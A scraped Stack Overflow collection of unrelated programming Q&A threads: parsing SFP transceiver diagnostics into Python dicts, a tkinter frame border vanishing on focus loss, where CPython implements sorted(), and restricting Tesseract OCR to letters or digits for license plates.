            "value": "-3.11",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
        "rx_power": {
            "value": "-4.68",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
        "tx_bias_current": {
            "value": "6.27",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
    },
    {
        "port": "2",
        "vendor": "VENDORY",
        "media_type": "SF+_SR",
        "part_number": "SFP-10G-SR",
        "serial_number": "Gxxxxxxxx",
        "wavelength": "850 nm",
        "temp": {
            "value": "37.00",
            "status": "normal",  # alarm threshold and warn threshold may be ignored
        },
        ...... etc
    },
]
[ "Updated (Complete rewrite and simplification).\nHere are some ideas for you -- adjust to taste.\nThe solution herein tries to avoid using \"domain specific knowledge\" as much as possible. The only assumptions are:\n\nEmpty lines don't matter.\nIndentation is meaningful.\nKeys are transformed to lowercase, and some content is removed (stuff in parentheses, 'name', 'threshold', and /...).\nWhen a line has multiple \"key : value\" pairs or is followed by an indented group of lines, that is a block of information pertaining to the first key.\n\nUltimately, when a key has multiple values (e.g. 'port'), then these values are put together as a list. When a key has a value that is a single dict (like for 'temp'), then the first key of that dict (the same as the key itself) is replaced by 'value'. Thus, we will see:\n\n{'port': [{'port': 1, ...}, {'port': 2, ...}, ...]}, but\n{'temp': {'value': 37, ...}}.\n\nRecords\nWe start by splitting each line into (key, value) pairs and note the indentation of the line. The result is a list of records, each containing: (indent, [(k0, v0), ...]):\nimport re\n\ndef proc_kv(k, v):\n k = re.sub(r'\\(.*\\)', '', k.lower())\n k = re.sub(r' (?:name|threshold)', '', k)\n k = re.sub(r'/\\S+', '', k)\n k = '_'.join(k.strip().split())\n for typ in (int, float):\n try:\n v = typ(v)\n break\n except ValueError:\n pass\n return k, v\n\ndef proc_line(s):\n s = re.sub(r'\\t', ' ' * 4, s) # handle tabs if any\n # split into one or more key-value pairs\n p = [e.strip() for e in re.split(r':', s)]\n if len(p) < 2:\n return None\n # if there are several pairs, use the largest space\n # to split '{v[i]} {k[i+1]}'\n p = [p[0]] + [\n e for x in p[1:-1]\n for e in x.split(max(re.split(r'( +)', x)[1::2]), maxsplit=1)\n ] + [p[-1]]\n kv_pairs = [proc_kv(k, v) for k, v in zip(p[::2], p[1::2])]\n # figure out the indentation of that line\n indent = len(s) - len(s.lstrip(' '))\n return indent, kv_pairs\n\nExample on your text:\nrecords = [r for r in [proc_line(s) for s in txt.splitlines()] if r]\n>>> records\n[(0, [('port', 1)]),\n (4, [('media_type', 'SF+_SR')]),\n (4, [('vendor', 'VENDORX')]),\n (4, [('part_number', 'SFP-10G-SR')]),\n (4, [('serial_number', 'Gxxxxxxxx')]),\n (4, [('wavelength', '850 nm')]),\n (4, [('temp', 37.0), ('status', 'Normal')]),\n (10, [('low_warn', -40.0), ('high_warn', 85.0)]),\n ...\n\nNote that not only keys but also values may contain spaces (e.g. 'Wavelength : 850 nm'). We decided to use the largest space to split intermediary '{v[i] k[i+]}' substrings. 
Thus:\n>>> proc_line(' a b : 34 nm c d : 4 ft')\n(2, [('a_b', '34 nm'), ('c_d', '4 ft')])\n\n# but\n>>> proc_line(' a b : 34 nm c d : 4 ft')\n(2, [('a_b', 34), ('nm_c_d', '4 ft')])\n\nBlocks\nWe then construct a hierarchical representation of the records in way that takes indentation into account:\ndef get_blocks(records, parent=None):\n indent, _ = records[0]\n starts = [i for i, (o_indent, _) in enumerate(records) if o_indent == indent]\n block = [] if parent is None else parent.copy()\n continuation_block = len(block) > 1\n for i, j in zip(starts, starts[1:] + [len(records)]):\n _, kv = records[i]\n continuation_block &= (single_line := i + 1 == j)\n if continuation_block:\n block += kv\n elif single_line:\n block += [(kv[0][0], kv)] if len(kv) > 1 else kv\n else:\n block.append((kv[0][0], get_blocks(records[i+1:j], parent=kv)))\n return block\n\nExample on the records above (obtained from your txt):\nblocks = get_blocks(records)\n>>> blocks\n[('port',\n [('port', 1),\n ('media_type', 'SF+_SR'),\n ('vendor', 'VENDORX'),\n ('part_number', 'SFP-10G-SR'),\n ('serial_number', 'Gxxxxxxxx'),\n ('wavelength', '850 nm'),\n ('temp',\n [('temp', 37.0),\n ...\n\nNote the repeated first key in sub blocks (e.g. ('port', [('port', 1), ...]) and ('temp', [('temp', 37.0), ...]).\nFinal structure\nWe then transform the blocks hierarchical structure into a dict, with some ad-hoc logic (no clobbering (k, v) pairs that have the same key, etc.). And finally put all the pieces together in a proc_txt() function:\ndef reshape(a):\n if isinstance(a, list) and len(a) == 1:\n a = a[0]\n if isinstance(a, dict):\n a = {'value' if i == 0 else k: v for i, (k, v) in enumerate(a.items())}\n return a\n\ndef to_dict(blocks):\n if not isinstance(blocks, list):\n return blocks\n d = {}\n for k, v in blocks:\n d[k] = d.get(k, []) + [to_dict(v)]\n return {k: reshape(v) for k, v in d.items()}\n\ndef proc_txt(txt):\n records = [r for r in [proc_line(s) for s in txt.splitlines()] if r]\n blocks = get_blocks(records)\n d = to_dict(blocks)\n return d\n\nExample on your text\n>>> proc_txt(txt)\n{'port': [{'port': 1,\n 'media_type': 'SF+_SR',\n 'vendor': 'VENDORX',\n 'part_number': 'SFP-10G-SR',\n 'serial_number': 'Gxxxxxxxx',\n 'wavelength': '850 nm',\n 'temp': {'value': 37.0,\n 'status': 'Normal',\n 'low_warn': -40.0,\n 'high_warn': 85.0,\n 'low_alarm': -50.0,\n 'high_alarm': 100.0},\n ...\n]}\n\n" ]
[ 2 ]
[]
[]
[ "data_conversion", "python" ]
stackoverflow_0074591658_data_conversion_python.txt
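Since the question says thresholds may be ignored, a far less general sketch than the answer above can target just the fields in the desired output. It hard-codes the field names from the sample (an assumption: any other fields are silently dropped) and relies on each reading line carrying its Status on the same line, as the parsed records above suggest; parse_ports is a made-up name:
import re

SIMPLE = {'Media Type': 'media_type', 'Vendor Name': 'vendor',
          'Part Number': 'part_number', 'Serial Number': 'serial_number',
          'Wavelength': 'wavelength'}
READING = {'Temp': 'temp', 'Voltage AUX-1/Vcc': 'voltage_aux-1',
           'Tx Power': 'tx_power', 'Rx Power': 'rx_power',
           'Tx Bias Current': 'tx_bias_current'}

def parse_ports(text):
    ports = []
    for chunk in re.split(r'(?m)^Port\s*:\s*', text)[1:]:
        lines = chunk.splitlines()
        port = {'port': lines[0].strip()}
        for line in lines[1:]:
            # Reading lines look like "Temp (Celsius) : 37.00    Status : Normal"
            m = re.match(r'\s*(.+?)\s*\([^)]*\)\s*:\s*(-?[\d.]+)\s+Status\s*:\s*(\w+)', line)
            if m and m.group(1) in READING:
                port[READING[m.group(1)]] = {'value': m.group(2),
                                             'status': m.group(3).lower()}
                continue
            # Simple one-pair lines such "Media Type : SF+_SR"; thresholds fall through
            key, _, value = line.partition(':')
            key = key.strip()
            if key in SIMPLE:
                port[SIMPLE[key]] = value.strip()
        ports.append(port)
    return ports

This trades the generality of the indentation-driven parser for a few lines of code that produce the exact list-of-dicts shape the question asks for.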
Q: Frame border disappears when focus is lost on window
I have a tkinter window from which I open another window. This window contains a Frame which is located inside a Canvas. I'm going to make a picture from the window contents, but the problem is that the frame border deactivates itself when the focus isn't on the window or when I click the button meant for that, and therefore is not present in the picture (this happens only in the real code). In this example the frame border isn't visible after the window is created. By clicking the "Save" button, which has no function here, it becomes visible. When the focus is lost on this window the frame disappears, but is activated again after clicking somewhere in this window. I have not the slightest idea why the frame border should behave like this at all. Is there a way to constantly display it?
import tkinter as tk
from tkinter import ttk

def open():
    window = tk.Toplevel()

    canvas = tk.Canvas(window, bd=0, highlightthickness=0)
    canvas.grid(row=0, column=0)

    frame = tk.Frame(canvas, bg="red")
    frame.config(highlightthickness=5, highlightcolor="black")
    frame.grid(row=0, column=0)

    text = tk.Label(frame, text="Text")
    text.grid(row=0, column=0)

    save_button = ttk.Button(frame, text="Save")
    save_button.grid(row=1, column=0, columnspan=1, pady=5)

root = tk.Tk()

open_button = ttk.Button(root, command=lambda: [open()], text="Open")
open_button.grid(row=0, column=0)

root.mainloop()

A: The highlightthickness and highlightcolor options are doing exactly what they are designed to do: they only appear when the frame has the focus. It is not designed to be the border of the frame, but rather an indicator of when the frame has focus.
If you want a permanent border then you should use the borderwidth and relief options, and/or put your frame inside another frame that uses any color you want for the border color.
Frame border disappears when focus is lost on window
I have a tkinter window from which I open another window. This window contains a Frame which is located inside a Canvas. I'm going to make a picture from the window contents but the problem is that the frame border deactivates itself when the focus isn't on the window or I click the meant button for that and therefore is not present in the picture (this happens only in the real code). In this example the frame border isn't visible after the window is created. By clicking the "Save" button which has no function here, it becomes visible. When the focus is lost on this window the frame disappears but is activated again after clicking somewhere in this window. I have not the slightest idea why the frame border should behave like this at all. Is there a way to constantly display it? import tkinter as tk from tkinter import ttk def open(): window = tk.Toplevel() canvas = tk.Canvas(window, bd=0, highlightthickness=0) canvas.grid(row=0, column=0) frame = tk.Frame(canvas, bg="red") frame.config(highlightthickness=5, highlightcolor="black") frame.grid(row=0, column=0) text = tk.Label(frame, text="Text") text.grid(row=0, column=0) save_button = ttk.Button(frame, text="Save") save_button.grid(row=1, column=0, columnspan=1, pady=5) root = tk.Tk() open_button = ttk.Button(root, command=lambda: [open()], text="Open") open_button.grid(row=0, column=0) root.mainloop()
[ "The highlightthickness and highlightcolor options are doing exactly what they are designed to do: they only appear when the frame has the focus. It is not designed to be the border of the frame, but rather an indicator of when the frame has focus.\nIf you want a permanent border then you should use borderwidth and relief options, and/or put your frame inside another frame that uses any color you want for the border color.\n" ]
[ 1 ]
[]
[]
[ "frame", "python", "tkinter", "tkinter_canvas" ]
stackoverflow_0074593595_frame_python_tkinter_tkinter_canvas.txt
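One more detail worth knowing: the highlight ring actually has two colour options, highlightcolor for when the widget has focus and highlightbackground for when it does not, so setting both to the same colour keeps the ring visible regardless of focus. A minimal sketch, reduced from the question's code:
import tkinter as tk

root = tk.Tk()
frame = tk.Frame(root, bg="red")
# highlightbackground is used when the frame does NOT have focus,
# highlightcolor when it does -- same value means an always-visible border.
frame.config(highlightthickness=5,
             highlightbackground="black",
             highlightcolor="black")
frame.grid(row=0, column=0, padx=10, pady=10)
tk.Label(frame, text="Text").grid(row=0, column=0)
root.mainloop()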
Q: Where is the actual "sorted" method being implemented in CPython and what is it doing here? Viewing the source code of CPython on GitHub, I saw the method here: https://github.com/python/cpython/blob/main/Python/bltinmodule.c And more specifically: static PyObject * builtin_sorted(PyObject *self, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames) { PyObject *newlist, *v, *seq, *callable; /* Keyword arguments are passed through list.sort() which will check them. */ if (!_PyArg_UnpackStack(args, nargs, "sorted", 1, 1, &seq)) return NULL; newlist = PySequence_List(seq); if (newlist == NULL) return NULL; callable = _PyObject_GetAttrId(newlist, &PyId_sort); if (callable == NULL) { Py_DECREF(newlist); return NULL; } assert(nargs >= 1); v = _PyObject_FastCallKeywords(callable, args + 1, nargs - 1, kwnames); Py_DECREF(callable); if (v == NULL) { Py_DECREF(newlist); return NULL; } Py_DECREF(v); return newlist; } I am not a C master, but I don't see any implementation of any of the known sorting algorithms, let alone the special sort that Python uses (I think it's called Timsort? - correct me if I'm wrong) I would highly appreciate if you could help me "digest" this code and understand it, because as of right now I've got: PyObject *newlist, *v, *seq, *callable; Which is creating a new list - even though list is mutable no? then why create a new one? and creating some other pointers, not sure why... then we unpack the rest of the arguments as the comment suggests, if it doesn't match the arguments there (being the function 'sorted' for example) then we break out.. I am pretty sure I am reading this all completely wrong, so I stopped here... Thanks for the help in advanced, sorry for the multiple questions but this block of code is blowing my mind and learning to read this would help me a lot! A: The actual sorting is done by list.sort. sorted simply creates a new list from whatever iterable argument it is given, sorts that list in-place, then returns it. A pure Python implementation of sorted might look like def sorted(itr, *, key=None): newlist = list(itr) newlist.sort(key=key) return newlist Most of the C code is just boilerplate for working with the underlying C data structures, detecting and propagating errors, and doing memory management. The actual sorting algorithm is spread throughout Objects/listobject.c; start here. If you are really interested in what the algorithm is, rather than how it is implemented in C, you may want to start with https://github.com/python/cpython/blob/main/Objects/listsort.txt instead. A: list sort implementation isn't there. This is a wrapper function fetching PyId_sort from there: callable = _PyObject_GetAttrId(newlist, &PyId_sort); object.h contains a macro using token pasting to define the PyId_xxx objects #define _Py_IDENTIFIER(varname) _Py_static_string(PyId_##varname, #varname) ... and I stopped digging after that. There could be more macro magic involved in order to enforce a coherent naming through the whole python codebase. The implementation is located here: https://github.com/python/cpython/blob/main/Objects/listobject.c More precisely around line 2240 static PyObject * list_sort_impl(PyListObject *self, PyObject *keyfunc, int reverse) /*[clinic end generated code: output=57b9f9c5e23fbe42 input=cb56cd179a713060]*/ { Comments read: /* An adaptive, stable, natural mergesort. See listsort.txt. * Returns Py_None on success, NULL on error. 
Even in case of error, the * list will be some permutation of its input state (nothing is lost or * duplicated). */ Now it takes some effort to understand the details of the algorithm but it's there.
Where is the actual "sorted" method being implemented in CPython and what is it doing here?
Viewing the source code of CPython on GitHub, I saw the method here: https://github.com/python/cpython/blob/main/Python/bltinmodule.c
And more specifically:
static PyObject *
builtin_sorted(PyObject *self, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames)
{
    PyObject *newlist, *v, *seq, *callable;

    /* Keyword arguments are passed through list.sort() which will check them. */
    if (!_PyArg_UnpackStack(args, nargs, "sorted", 1, 1, &seq))
        return NULL;

    newlist = PySequence_List(seq);
    if (newlist == NULL)
        return NULL;

    callable = _PyObject_GetAttrId(newlist, &PyId_sort);
    if (callable == NULL) {
        Py_DECREF(newlist);
        return NULL;
    }

    assert(nargs >= 1);
    v = _PyObject_FastCallKeywords(callable, args + 1, nargs - 1, kwnames);
    Py_DECREF(callable);
    if (v == NULL) {
        Py_DECREF(newlist);
        return NULL;
    }
    Py_DECREF(v);
    return newlist;
}

I am not a C master, but I don't see any implementation of any of the known sorting algorithms, let alone the special sort that Python uses (I think it's called Timsort? - correct me if I'm wrong).
I would highly appreciate it if you could help me "digest" this code and understand it, because as of right now I've got:
PyObject *newlist, *v, *seq, *callable;

which is creating a new list - even though lists are mutable, no? Then why create a new one? And creating some other pointers, not sure why... Then we unpack the rest of the arguments as the comment suggests; if it doesn't match the arguments there (being the function 'sorted' for example) then we break out..
I am pretty sure I am reading this all completely wrong, so I stopped here...
Thanks for the help in advance, and sorry for the multiple questions, but this block of code is blowing my mind and learning to read this would help me a lot!
[ "The actual sorting is done by list.sort. sorted simply creates a new list from whatever iterable argument it is given, sorts that list in-place, then returns it. A pure Python implementation of sorted might look like\ndef sorted(itr, *, key=None):\n newlist = list(itr)\n newlist.sort(key=key)\n return newlist\n\nMost of the C code is just boilerplate for working with the underlying C data structures, detecting and propagating errors, and doing memory management.\nThe actual sorting algorithm is spread throughout Objects/listobject.c; start here. If you are really interested in what the algorithm is, rather than how it is implemented in C, you may want to start with https://github.com/python/cpython/blob/main/Objects/listsort.txt instead.\n", "list sort implementation isn't there. This is a wrapper function fetching PyId_sort from there:\ncallable = _PyObject_GetAttrId(newlist, &PyId_sort);\n\nobject.h contains a macro using token pasting to define the PyId_xxx objects\n#define _Py_IDENTIFIER(varname) _Py_static_string(PyId_##varname, #varname)\n\n... and I stopped digging after that. There could be more macro magic involved in order to enforce a coherent naming through the whole python codebase.\nThe implementation is located here:\nhttps://github.com/python/cpython/blob/main/Objects/listobject.c\nMore precisely around line 2240\nstatic PyObject *\nlist_sort_impl(PyListObject *self, PyObject *keyfunc, int reverse)\n/*[clinic end generated code: output=57b9f9c5e23fbe42 input=cb56cd179a713060]*/\n{\n\nComments read:\n/* An adaptive, stable, natural mergesort. See listsort.txt.\n * Returns Py_None on success, NULL on error. Even in case of error, the\n * list will be some permutation of its input state (nothing is lost or\n * duplicated).\n */\n\nNow it takes some effort to understand the details of the algorithm but it's there.\n" ]
[ 1, 0 ]
[]
[]
[ "c", "cpython", "python" ]
stackoverflow_0074593461_c_cpython_python.txt
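A small sketch that checks the equivalence the first answer describes, and the stability that listsort.txt documents; nothing here is CPython-specific beyond relying on those documented guarantees:
data = [3, -1, 5, 2]
copy = list(data)
copy.sort(key=abs)                      # in-place, returns None
assert sorted(data, key=abs) == copy    # sorted() == copy + list.sort
assert data == [3, -1, 5, 2]            # the input is left untouched

# Timsort is stable: equal keys keep their original relative order.
pairs = [('b', 2), ('a', 1), ('b', 1)]
assert sorted(pairs, key=lambda p: p[0]) == [('a', 1), ('b', 2), ('b', 1)]
print('ok')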
Q: pyTesseract recognize a pattern of text
I'm trying to do a simple license plate recognizer. Currently my problem comes from Tesseract messing up some readings (for example 5 as S). I know the images are always going to be three uppercase characters, followed by three digits, in the form AAA 999 or so. Is there any way I can give this info to the OCR?
A: Tesseract allows you to whitelist specific characters using the tessedit_char_whitelist parameter.
A way to address your license plate identification problem would be to split your detection window in two "subwindows", and:

whitelist letters for the first subwindow (tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZ)
whitelist numbers for the second subwindow (tessedit_char_whitelist=0123456789)
pyTesseract recognize a pattern of text
I'm trying to do a simple license plate recognizer. Currently my problem comes from Tesseract messing up some readings (for example 5 as S). I know the images are always going to be three uppercase characters, followed by three digits, in the form AAA 999 or so. Is there any way I can give this info to the OCR?
[ "Tesseract allows to whitelist specific characters using the tessedit_char_whitelist parameter.\nA way to address your license plate identification problem would be to split your detection window in two \"subwindows\", and:\n\nwhitelist letters for the first subwindow (tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZ)\nwhitelist numbers for the second subwindow (tessedit_char_whitelist=0123456789)\n\n" ]
[ 1 ]
[]
[]
[ "python", "python_tesseract", "tesseract" ]
stackoverflow_0074593614_python_python_tesseract_tesseract.txt
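A sketch of how the whitelist idea looks with pytesseract, assuming the plate image has already been located; the file name plate.png and the naive left/right split are placeholders for a real character-region detector:
import pytesseract
from PIL import Image

plate = Image.open('plate.png')  # hypothetical pre-cropped plate image
left = plate.crop((0, 0, plate.width // 2, plate.height))             # AAA part
right = plate.crop((plate.width // 2, 0, plate.width, plate.height))  # 999 part

letters = pytesseract.image_to_string(
    left, config='--psm 7 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZ').strip()
digits = pytesseract.image_to_string(
    right, config='--psm 7 -c tessedit_char_whitelist=0123456789').strip()
print(letters, digits)

Here --psm 7 tells Tesseract to treat each crop as a single text line. As a pure post-processing fallback, a per-position confusion map (S -> 5, O -> 0, I -> 1 for the digit positions) can also enforce the AAA 999 pattern on an unconstrained OCR result.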